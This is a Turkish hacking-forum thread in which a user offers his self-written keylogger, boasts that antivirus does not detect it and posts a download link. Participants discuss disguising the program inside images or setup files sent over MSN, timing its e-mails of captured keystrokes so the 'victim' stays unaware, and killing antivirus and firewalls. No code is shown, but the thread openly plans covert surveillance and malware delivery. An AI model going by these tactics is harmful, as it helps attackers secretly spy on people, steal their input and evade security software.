folder Tahribat.com Forumları
linefolder Bilgisayar Güvenliği - Backdoorlar
linefolder MK (Manyak Keylogger) Coded By Me AVG Lere Yakalnmıyor Kaçırırsanız Üzülürsünüz.

MK (Manyak Keylogger) Coded By Me AVG Lere Yakalnmıyor Kaçırırsanız Üzülürsünüz.

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DrKill
    DrKill's avatar
    Erkek
    Blacktron bunu yazdı:

Aslinda söyle güzel birJoiner programi lazim.

Istedigimiz serveri JPG veya MP3 veya baska formatli dosyalari ile birlestirebilecek.

Bu arada Link kirik hala MK Keyloggeri indirip deneyemedim.

saygilar

Hocam ters tıkla hedefi farklı kaydet de yüklemiyor mu ???? eğer yüklemiyorsa www.manyakpc.com bi dene giriyormu giriyorsa sorun link te ama ben indirebiliyorum giremiyorsan dns nle ilgili olabilir .? :S

Bu imzayı her gördüğünüzde 4gb kotanızın 0,00000358559191226959228515625 azalmaktadır. Bilerek ve istenerek bu imza yapılmıştır. Amaç kotanızı sömürmektir
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Blacktron
    Blacktron's avatar
    Erkek

Dostum ne yapsam Bu safa acilamiyor diye uyari geliyor sayfa bom bos.

verdigin su  www.manyakpc.com linkide deniyorum sonuc yine ayni yani safya ailmiyor.Bu arada sana Privat Mesaj atmistim.

3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    c0ldsore
    c0ldsore's avatar
    Erkek

upx.exe diye bir dosyada oluşuyor onuda göndermek gereklimi

teşekkürler

4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DrKill
    DrKill's avatar
    Erkek
    Hocam upx dosyası nı silmesi lazım ama sanırım makinan eski öyle mi ?? UPX dosyasını göndermene gerek yok..

Bu imzayı her gördüğünüzde 4gb kotanızın 0,00000358559191226959228515625 azalmaktadır. Bilerek ve istenerek bu imza yapılmıştır. Amaç kotanızı sömürmektir
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DrKill
    DrKill's avatar
    Erkek
    Programı indiremeyenler bu adresten indirebilirler...
    http://rapidshare.de/files/3718430/mk.rar.html
    Ayrıca
    Blacktron programı Delphi 7 ile yazdım.

6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Blacktron
    Blacktron's avatar
    Erkek

@DrKill,

tamam Dostm simdi indirdim, cok saol bir bakayim simdi.

Ya bu sekilde Programlarin C++ kodlari lazim bana incelemek icin.Bu tür kodlari nette bulmak zor.O nedenle sormustum  Dostum !!

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DrKill
    DrKill's avatar
    Erkek
    kırılıyorum ama yorum yazan yok ii ii

8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Blacktron
    Blacktron's avatar
    Erkek

Var dostum var !!

Simdi Programi inceledim biraz.Güzel sade bir calisma olmus.

Bilgisayarin acilisindan sonra mail gönder secenegine zaman dilimleri koymussun.Bu bence gereksiz degilmi?Simdi ben orayi örnegin 1 saat yaptim her 1 saatte keylogger mail göndermeye calisirsa bu Victimi kukulandirabilir.

Yada ben örnegin ben 4 saat secenegini sectim.O zaman benim Victim fazla online olmayan bir kisi ise, örnegin 15-20 dakikadan fazla online olmuyor ise ne olacak?Taa ki bizim Victim ne zaman 4 saat online kalirsa bizim keylogger o zaman bize mail atacak.Sen orayi en iyisi Her online olusunda 1 kere göndersin yeter o sekilde yaparsan daha iyi olur.Ha sen dersinki ben bu isi is yerlerini düsünerek yazdim örnegin Bilgisayar basinda calisan kisileri kontro icin yazdim dersen o baska tabiki.

Birde AVG ve Firewall kill etme funktionu koyarsan daha güzel olur.Simdilk bu kadar ama güzel olmus bu sadeligini bozma.

9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DrKill
    DrKill's avatar
    Erkek

her online olduğunda yolla seçeneiğini düşünürüm saol . Ancak 1 saat seçeneği kurbanı kuşkulandıracak bir seçenek değil çünkü mail yollanırken program hiç bir şekilde makinada kasma YAPMIYOR . Bu ii bir özellik AVG leri kill etme functionuna gerek yok zaten tanıyamıyorlar ama firewalllar için var.. Ancak yeni versiyonu (yaparmıyım bilmiyorum) yaparsam firewallların yakalayamayacaağı şekilde yapacağım...

Yorum yazdığın için teşekkürler .. Diğer vatandaşlarıda görürsem sevinirim ....

10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BozcaN
    BozcaN's avatar
    Erkek
    DrKill bunu yazdı:

hocam başka şeylerlede birleştirsen sonuçta gene sonuç exe olarak çıkcak bence dosyayı rar la yada zip lere msn den yolla. Bi setub la felan birleştir sonra ziple yolla deki al yeni çıkmış adam alsın alır almaz alsın :P :D :D içinemi alır dışına mı bilemem eğer şüphelenirse TARA LAN TARA hırbo de :D :P :D

falla kardesim en son öyle yaptım bende :) sonadan jeton düştü aklıma geldi zman aldım kusura bakmayın ama ögreniyoz işte..

√ βǾź¢ẵŋ ® //\\ ~ Türkiye"de yaşayan Türk"e biat edecek !!
Toplam Hit: 14083 Toplam Mesaj: 45